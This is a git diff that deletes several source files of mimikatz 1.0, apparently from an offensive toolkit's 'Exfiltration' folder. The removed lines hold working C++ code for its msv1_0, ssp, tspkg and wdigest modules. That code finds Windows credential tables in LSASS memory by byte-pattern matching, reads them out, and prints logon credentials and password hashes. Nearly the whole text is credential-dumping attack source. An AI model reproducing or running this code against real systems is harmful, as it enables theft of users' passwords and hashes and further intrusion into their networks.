@@ -1,105 +0,0 @@ -/*	Benjamin DELPY `gentilkiwi` -	http://blog.gentilkiwi.com -	benjamin@gentilkiwi.com -	Licence    : http://creativecommons.org/licenses/by/3.0/fr/ -	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../mod_mimikatz_sekurlsa.h" - -class mod_mimikatz_sekurlsa_msv1_0 { - -private: -	typedef struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS { -		PVOID unk0; // next? -		LSA_UNICODE_STRING Primary; -		LSA_UNICODE_STRING Credentials; -	} KIWI_MSV1_0_PRIMARY_CREDENTIALS, *PKIWI_MSV1_0_PRIMARY_CREDENTIALS; - -	typedef struct _KIWI_MSV1_0_CREDENTIALS { -		PVOID unk0; // next? -		DWORD AuthenticationPackageId; -		PVOID PrimaryCredentials; -	} KIWI_MSV1_0_CREDENTIALS, *PKIWI_MSV1_0_CREDENTIALS; - -	typedef struct _KIWI_MSV1_0_LIST_5 { -		struct _KIWI_MSV1_0_LIST_5 *Flink; -		struct _KIWI_MSV1_0_LIST_5 *Blink; -		LUID LocallyUniqueIdentifier; -		LSA_UNICODE_STRING UserName; -		LSA_UNICODE_STRING Domaine; -		PVOID unk14; // 0 -		PVOID unk15; // 0 -		PVOID unk16; // offset unk_181A080 -		DWORD unk17; // 0Ah -		DWORD unk18; // 2 -	#ifdef _M_IX86 -		DWORD unk19; -	#endif -		DWORD unk20; // 5AC4186Ch -		DWORD unk21; // 1CD6BFDh -		LSA_UNICODE_STRING LogonServer; -		PKIWI_MSV1_0_CREDENTIALS Credentials; -		PVOID unk22; // 0C14h -		PVOID unk23; // 0BFCh -	} KIWI_MSV1_0_LIST_5, *PKIWI_MSV1_0_LIST_5; - -	typedef struct _KIWI_MSV1_0_LIST_6 { -		struct _KIWI_MSV1_0_LIST_6 *Flink; -		struct _KIWI_MSV1_0_LIST_6 *Blink; -		PVOID unk0;	// unk_18457A0 -		DWORD unk1; // 0FFFFFFFFh -		DWORD unk2; // 0 -		PVOID unk3; // 0 -		PVOID unk4; // 0 -		PVOID unk5; // 0 -		PVOID unk6; // 0C04h -		PVOID unk7; // 0 -		PVOID unk8; // 0C08h -		PVOID unk9; // 0 -		PVOID unk10; // 0 -		DWORD unk11; // 0 -		DWORD unk12; // 0 -		PVOID unk13; // offset off_18456A0 -		LUID LocallyUniqueIdentifier; -		LUID SecondaryLocallyUniqueIdentifier; -		LSA_UNICODE_STRING UserName; -		LSA_UNICODE_STRING Domaine; -		PVOID unk14; // 0		Windows  8 + 2*PVOID / 4*PVOID!! 
-		PVOID unk15; // 0 -		PVOID unk16; // offset unk_181A080 -		DWORD unk17; // 0Ah -		DWORD unk18; // 2 -	#ifdef _M_IX86 -		DWORD unk19; -	#endif -		DWORD unk20; // 5AC4186Ch -		DWORD unk21; // 1CD6BFDh -		LSA_UNICODE_STRING LogonServer; -		PKIWI_MSV1_0_CREDENTIALS Credentials; -		PVOID unk22; // 0C14h -		PVOID unk23; // 0BFCh -	} KIWI_MSV1_0_LIST_6, *PKIWI_MSV1_0_LIST_6; - -	typedef struct _MSV1_0_PRIMARY_CREDENTIAL {  -		LSA_UNICODE_STRING LogonDomainName;  -		LSA_UNICODE_STRING UserName;  -		BYTE NtOwfPassword[0x10]; -		BYTE LmOwfPassword[0x10]; -		BOOLEAN NtPasswordPresent;  -		BOOLEAN LmPasswordPresent; -		wchar_t BuffDomaine[MAX_DOMAIN_LEN]; -		wchar_t BuffUserName[MAX_USERNAME_LEN]; -	} MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL;  - -	static void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative = true); - -	static PLIST_ENTRY LogonSessionList; -	static PULONG LogonSessionListCount; -	static bool searchLogonSessionList(); - -	static bool decryptAndDisplayCredsBlock(LSA_UNICODE_STRING * monBlock, bool justSecurity); -public: -	static bool getMSV(vector<wstring> * arguments); -	static bool WINAPI getMSVLogonData(__in PLUID logId, __in bool justSecurity); -};
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.cpp
deleted file mode 100644
index 86dab86..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.cpp
+++ /dev/null
@@ -1,92 +0,0 @@ -/*	Benjamin DELPY `gentilkiwi` -	http://blog.gentilkiwi.com -	benjamin@gentilkiwi.com -	Licence    : http://creativecommons.org/licenses/by/3.0/fr/ -	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "ssp.h" -#include "..\..\global.h" -mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_ssp::pModMSV = NULL; -mod_mimikatz_sekurlsa_ssp::PKIWI_SSP_CREDENTIAL_LIST_ENTRY mod_mimikatz_sekurlsa_ssp::SspCredentialList = NULL; - -bool mod_mimikatz_sekurlsa_ssp::getSSP(vector<wstring> * arguments) -{ -	vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider; -	monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getSSPLogonData, wstring(L"ssp"))); -	return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider); -} - -bool mod_mimikatz_sekurlsa_ssp::searchSSPEntryList() -{ -#ifdef _M_X64 -	BYTE PTRN_WIN5_SspCredentialList[]= {0xc7, 0x43, 0x24, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15}; -	LONG OFFS_WIN5_SspCredentialList = sizeof(PTRN_WIN5_SspCredentialList) + 4 + 3; -	BYTE PTRN_WIN6_SspCredentialList[]= {0xc7, 0x47, 0x24, 0x43, 0x72, 0x64, 0x41, 0x48, 0x89, 0x47, 0x78, 0xff, 0x15}; -	LONG OFFS_WIN6_SspCredentialList = sizeof(PTRN_WIN6_SspCredentialList) + 4 + 3; -#elif defined _M_IX86 -	BYTE PTRN_WALL_SspCredentialList[]= {0x1c, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15}; -	LONG OFFS_WALL_SspCredentialList = sizeof(PTRN_WALL_SspCredentialList) + 4 + 1; -#endif - -	if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModMSV && !SspCredentialList) -	{ -		PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0; -		pointeur= reinterpret_cast<PBYTE *>(&SspCredentialList); - -#ifdef _M_X64 -		if(mod_system::GLOB_Version.dwMajorVersion < 6) -		{ -			pattern = PTRN_WIN5_SspCredentialList; -			taille = sizeof(PTRN_WIN5_SspCredentialList); -			offset = OFFS_WIN5_SspCredentialList; -		} -		else -		{ -			pattern = PTRN_WIN6_SspCredentialList; -			taille = 
sizeof(PTRN_WIN6_SspCredentialList); -			offset = OFFS_WIN6_SspCredentialList; -		} -#elif defined _M_IX86 -		pattern = PTRN_WALL_SspCredentialList; -		taille = sizeof(PTRN_WALL_SspCredentialList); -		offset = OFFS_WALL_SspCredentialList; -#endif -		if(HMODULE monModule = LoadLibrary(L"msv1_0")) -		{ -			MODULEINFO mesInfos; -			if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO))) -			{ -				mod_memory::genericPatternSearch(pointeur, L"msv1_0", pattern, taille, offset); -				*pointeur += pModMSV->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); -			} -			FreeLibrary(monModule); -		} -	} -	return (SspCredentialList != NULL); -} - -bool WINAPI mod_mimikatz_sekurlsa_ssp::getSSPLogonData(__in PLUID logId, __in bool justSecurity) -{ -	if(searchSSPEntryList()) -	{ -		KIWI_SSP_CREDENTIAL_LIST_ENTRY mesCredentials; -		DWORD monNb = 0; -		if(mod_memory::readMemory(SspCredentialList, &mesCredentials, sizeof(LIST_ENTRY), mod_mimikatz_sekurlsa::hLSASS)) -		{ -			while(mesCredentials.Flink != SspCredentialList) -			{ -				if(mod_memory::readMemory(mesCredentials.Flink, &mesCredentials, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY), mod_mimikatz_sekurlsa::hLSASS)) -				{ -					if(RtlEqualLuid(logId, &(mesCredentials.LogonId))) -					{ -						mod_mimikatz_sekurlsa::genericCredsToStream(&mesCredentials.credentials, justSecurity, true, &monNb); -						monNb++; -					} -				} -			} -		} -	} -	else (*outputStream) << L"n.a. (SSP KO)"; - -	return true; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.h deleted file mode 100644 index d2d5396..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.h +++ /dev/null @@ -1,32 +0,0 @@ -/*	Benjamin DELPY `gentilkiwi` -	http://blog.gentilkiwi.com -	benjamin@gentilkiwi.com -	Licence    : http://creativecommons.org/licenses/by/3.0/fr/ -	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../mod_mimikatz_sekurlsa.h" - -class mod_mimikatz_sekurlsa_ssp { - -private: -	typedef struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY { -		struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY *Flink; -		struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY *Blink; -		ULONG References; -		ULONG CredentialReferences; -		LUID LogonId; -		ULONG unk0; -		ULONG unk1; -		ULONG unk2; -		KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; -	} KIWI_SSP_CREDENTIAL_LIST_ENTRY, *PKIWI_SSP_CREDENTIAL_LIST_ENTRY; - -	static PKIWI_SSP_CREDENTIAL_LIST_ENTRY SspCredentialList; -	static bool searchSSPEntryList(); - -public: -	static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModMSV; -	static bool getSSP(vector<wstring> * arguments); -	static bool WINAPI getSSPLogonData(__in PLUID logId, __in bool justSecurity); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.cpp deleted file mode 100644 index 71e3751..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.cpp +++ /dev/null 
@@ -1,94 +0,0 @@
-/*	Benjamin DELPY `gentilkiwi`
-	http://blog.gentilkiwi.com
-	benjamin@gentilkiwi.com
-	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
-	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#include "tspkg.h"
-#include "..\..\global.h"
-mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_tspkg::pModTSPKG = NULL;
-PRTL_AVL_TABLE mod_mimikatz_sekurlsa_tspkg::TSGlobalCredTable = NULL; //reinterpret_cast<PRTL_AVL_TABLE>(NULL);
-
-bool mod_mimikatz_sekurlsa_tspkg::getTsPkg(vector<wstring> * arguments)
-{
-	vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider;
-	monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getTsPkgLogonData, wstring(L"tspkg")));
-	return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider);
-}
-
-bool mod_mimikatz_sekurlsa_tspkg::searchTSPKGFuncs()
-{
-#ifdef _M_X64
-	BYTE PTRN_WALL_TSGlobalCredTable[]	= {0x48, 0x83, 0xec, 0x20, 0x48, 0x8d, 0x0d};
-	LONG OFFS_WALL_TSGlobalCredTable	= sizeof(PTRN_WALL_TSGlobalCredTable);
-#elif defined _M_IX86
-	BYTE PTRN_WNO8_TSGlobalCredTable[]	= {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x51, 0x56, 0xbe};
-	LONG OFFS_WNO8_TSGlobalCredTable	= sizeof(PTRN_WNO8_TSGlobalCredTable);
-
-	BYTE PTRN_WIN8_TSGlobalCredTable[]	= {0x8b, 0xff, 0x53, 0xbb};
-	LONG OFFS_WIN8_TSGlobalCredTable	= sizeof(PTRN_WIN8_TSGlobalCredTable);
-#endif
-
-	if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModTSPKG && !TSGlobalCredTable)
-	{
-		PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0;
-
-		pointeur= reinterpret_cast<PBYTE *>(&TSGlobalCredTable);
-#ifdef _M_X64
-		pattern	= PTRN_WALL_TSGlobalCredTable;
-		taille	= sizeof(PTRN_WALL_TSGlobalCredTable);
-		offset	= OFFS_WALL_TSGlobalCredTable;
-#elif defined _M_IX86
-		if(mod_system::GLOB_Version.dwBuildNumber < 8000)
-		{
-			pattern	= PTRN_WNO8_TSGlobalCredTable;
-			taille	= sizeof(PTRN_WNO8_TSGlobalCredTable);
-			offset	= OFFS_WNO8_TSGlobalCredTable;
-		}
-		else
-		{
-			pattern	= PTRN_WIN8_TSGlobalCredTable;
-			taille	= sizeof(PTRN_WIN8_TSGlobalCredTable);
-			offset	= OFFS_WIN8_TSGlobalCredTable;
-		}
-#endif
-
-		if(HMODULE monModule = LoadLibrary(L"tspkg"))
-		{
-			MODULEINFO mesInfos;
-			if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO)))
-			{
-				mod_memory::genericPatternSearch(pointeur, L"tspkg", pattern, taille, offset);
-				*pointeur += pModTSPKG->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll);
-			}
-			FreeLibrary(monModule);
-		}
-	}
-	return (pModTSPKG && TSGlobalCredTable);
-}
-
-bool WINAPI mod_mimikatz_sekurlsa_tspkg::getTsPkgLogonData(__in PLUID logId, __in bool justSecurity)
-{
-	if(searchTSPKGFuncs())
-	{
-		PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL;
-		BYTE * monBuffP = new BYTE[sizeof(KIWI_TS_CREDENTIAL)], * monBuffC = new BYTE[sizeof(KIWI_TS_PRIMARY_CREDENTIAL)];
-		if(PKIWI_TS_CREDENTIAL pLogSession = reinterpret_cast<PKIWI_TS_CREDENTIAL>(mod_mimikatz_sekurlsa::getPtrFromAVLByLuid(TSGlobalCredTable, FIELD_OFFSET(KIWI_TS_CREDENTIAL, LocallyUniqueIdentifier), logId)))
-		{
-			if(mod_memory::readMemory(pLogSession, monBuffP, sizeof(KIWI_TS_CREDENTIAL), mod_mimikatz_sekurlsa::hLSASS))
-			{
-				pLogSession = reinterpret_cast<PKIWI_TS_CREDENTIAL>(monBuffP);
-				if(pLogSession->pTsPrimary)
-				{
-					if(mod_memory::readMemory(pLogSession->pTsPrimary, monBuffC, sizeof(KIWI_TS_PRIMARY_CREDENTIAL), mod_mimikatz_sekurlsa::hLSASS))
-						mesCreds = &(reinterpret_cast<PKIWI_TS_PRIMARY_CREDENTIAL>(monBuffC)->credentials);
-				}
-				else (*outputStream) << L"n.s. (SuppCred KO) / ";
-			}
-		}
-		mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity, true);
-		delete [] monBuffC, monBuffP;
-	}
-	else (*outputStream) << L"n.a. (tspkg KO)";
-	return true;
-}
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h
deleted file mode 100644
index 35a3b15..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h
+++ /dev/null
@@ -1,37 +0,0 @@
-/*	Benjamin DELPY `gentilkiwi`
-	http://blog.gentilkiwi.com
-	benjamin@gentilkiwi.com
-	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
-	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "../mod_mimikatz_sekurlsa.h"
-
-class mod_mimikatz_sekurlsa_tspkg {
-
-private:
-	typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
-		PVOID unk0;	// lock ?
-		KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
-	} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;
-
-	typedef struct _KIWI_TS_CREDENTIAL {
-	#ifdef _M_X64
-		BYTE unk0[108];
-	#elif defined _M_IX86
-		BYTE unk0[64];
-	#endif
-		LUID LocallyUniqueIdentifier;
-		PVOID unk1;
-		PVOID unk2;
-		PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
-	} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
-
-	static PRTL_AVL_TABLE TSGlobalCredTable;
-	static bool searchTSPKGFuncs();
-
-public:
-	static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModTSPKG;
-	static bool getTsPkg(vector<wstring> * arguments);
-	static bool WINAPI getTsPkgLogonData(__in PLUID logId, __in bool justSecurity);
-};
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.cpp
deleted file mode 100644
index b6e3062..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.cpp
+++ /dev/null
@@ -1,91 +0,0 @@
-/*	Benjamin DELPY `gentilkiwi`
-	http://blog.gentilkiwi.com
-	benjamin@gentilkiwi.com
-	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
-	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#include "wdigest.h"
-#include "..\..\global.h"
-mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_wdigest::pModWDIGEST = NULL;
-mod_mimikatz_sekurlsa_wdigest::PKIWI_WDIGEST_LIST_ENTRY mod_mimikatz_sekurlsa_wdigest::l_LogSessList = NULL;
-long mod_mimikatz_sekurlsa_wdigest::offsetWDigestPrimary = 0;
-
-bool mod_mimikatz_sekurlsa_wdigest::getWDigest(vector<wstring> * arguments)
-{
-	vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider;
-	monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getWDigestLogonData, wstring(L"wdigest")));
-	return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider);
-}
-
-bool mod_mimikatz_sekurlsa_wdigest::searchWDigestEntryList()
-{
-#ifdef _M_X64
-	BYTE PTRN_WNO8_InsertInLogSess[]= {0x4c, 0x89, 0x1b, 0x48, 0x89, 0x43, 0x08, 0x49, 0x89, 0x5b, 0x08, 0x48, 0x8d};
-	BYTE PTRN_W8CP_InsertInLogSess[]= {0x4c, 0x89, 0x1b, 0x48, 0x89, 0x4b, 0x08, 0x49, 0x8b, 0x43, 0x08, 0x4c, 0x39};
-	BYTE PTRN_W8RP_InsertInLogSess[]= {0x4c, 0x89, 0x1b, 0x48, 0x89, 0x43, 0x08, 0x49, 0x39, 0x43, 0x08, 0x0f, 0x85};
-#elif defined _M_IX86
-	BYTE PTRN_WNO8_InsertInLogSess[]= {0x8b, 0x45, 0x08, 0x89, 0x08, 0xc7, 0x40, 0x04};
-	BYTE PTRN_W8CP_InsertInLogSess[]= {0x89, 0x0e, 0x89, 0x56, 0x04, 0x8b, 0x41, 0x04};
-	BYTE PTRN_W8RP_InsertInLogSess[]= {0x89, 0x06, 0x89, 0x4e, 0x04, 0x39, 0x48, 0x04};
-#endif
-	LONG OFFS_WALL_InsertInLogSess	= -4;
-
-	if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModWDIGEST && !l_LogSessList)
-	{
-		PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0;
-
-		pointeur= reinterpret_cast<PBYTE *>(&l_LogSessList);
-		offset	= OFFS_WALL_InsertInLogSess;
-		if(mod_system::GLOB_Version.dwBuildNumber < 8000)
-		{
-			
pattern	= PTRN_WNO8_InsertInLogSess;
-			taille	= sizeof(PTRN_WNO8_InsertInLogSess);
-		}
-		else if(mod_system::GLOB_Version.dwBuildNumber < 8400)
-		{
-			pattern	= PTRN_W8CP_InsertInLogSess;
-			taille	= sizeof(PTRN_W8CP_InsertInLogSess);
-		}
-		else
-		{
-			pattern	= PTRN_W8RP_InsertInLogSess;
-			taille	= sizeof(PTRN_W8RP_InsertInLogSess);
-		}
-
-		if(HMODULE monModule = LoadLibrary(L"wdigest"))
-		{
-			MODULEINFO mesInfos;
-			if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO)))
-			{
-				mod_memory::genericPatternSearch(pointeur, L"wdigest", pattern, taille, offset, "SpInstanceInit", false);
-				*pointeur += pModWDIGEST->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll);
-			}
-			FreeLibrary(monModule);
-		}
-
-#ifdef _M_X64
-		offsetWDigestPrimary = ((mod_system::GLOB_Version.dwMajorVersion < 6) ? ((mod_system::GLOB_Version.dwMinorVersion < 2) ? 36 : 48) : 48);
-#elif defined _M_IX86
-		offsetWDigestPrimary = ((mod_system::GLOB_Version.dwMajorVersion < 6) ? ((mod_system::GLOB_Version.dwMinorVersion < 2) ? 
36 : 28) : 32);
-#endif
-	}
-	return (pModWDIGEST && l_LogSessList);
-}
-
-bool WINAPI mod_mimikatz_sekurlsa_wdigest::getWDigestLogonData(__in PLUID logId, __in bool justSecurity)
-{
-	if(searchWDigestEntryList())
-	{
-		PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL;
-		DWORD taille = offsetWDigestPrimary + sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL);
-		BYTE * monBuff = new BYTE[taille];
-		if(PLIST_ENTRY pLogSession = mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(l_LogSessList), FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier), logId))
-			if(	mod_memory::readMemory(pLogSession, monBuff, taille, mod_mimikatz_sekurlsa::hLSASS))
-				mesCreds = reinterpret_cast<PKIWI_GENERIC_PRIMARY_CREDENTIAL>(reinterpret_cast<PBYTE>(monBuff) + offsetWDigestPrimary);
-		mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity);
-		delete [] monBuff;
-	}
-	else (*outputStream) << L"n.a. (wdigest KO)";
-
-	return true;
-}
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.h
deleted file mode 100644
index 9db3c8b..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.h
+++ /dev/null
@@ -1,29 +0,0 @@
-/*	Benjamin DELPY `gentilkiwi`
-	http://blog.gentilkiwi.com
-	benjamin@gentilkiwi.com
-	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
-	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "../mod_mimikatz_sekurlsa.h"
-
-class mod_mimikatz_sekurlsa_wdigest {
-
-private:
-	typedef struct _KIWI_WDIGEST_LIST_ENTRY {
-		struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
-		struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
-		DWORD	UsageCount;
-		struct _KIWI_WDIGEST_LIST_ENTRY *This;
-		LUID LocallyUniqueIdentifier;
-	} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
-
-	static PKIWI_WDIGEST_LIST_ENTRY l_LogSessList;
-	static long offsetWDigestPrimary;
-	static bool searchWDigestEntryList();
-
-public:
-	static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModWDIGEST;
-	static bool getWDigest(vector<wstring> * arguments);
-	static bool WINAPI getWDigestLogonData(__in PLUID logId, __in bool justSecurity);
-};
\ No newline at end of file |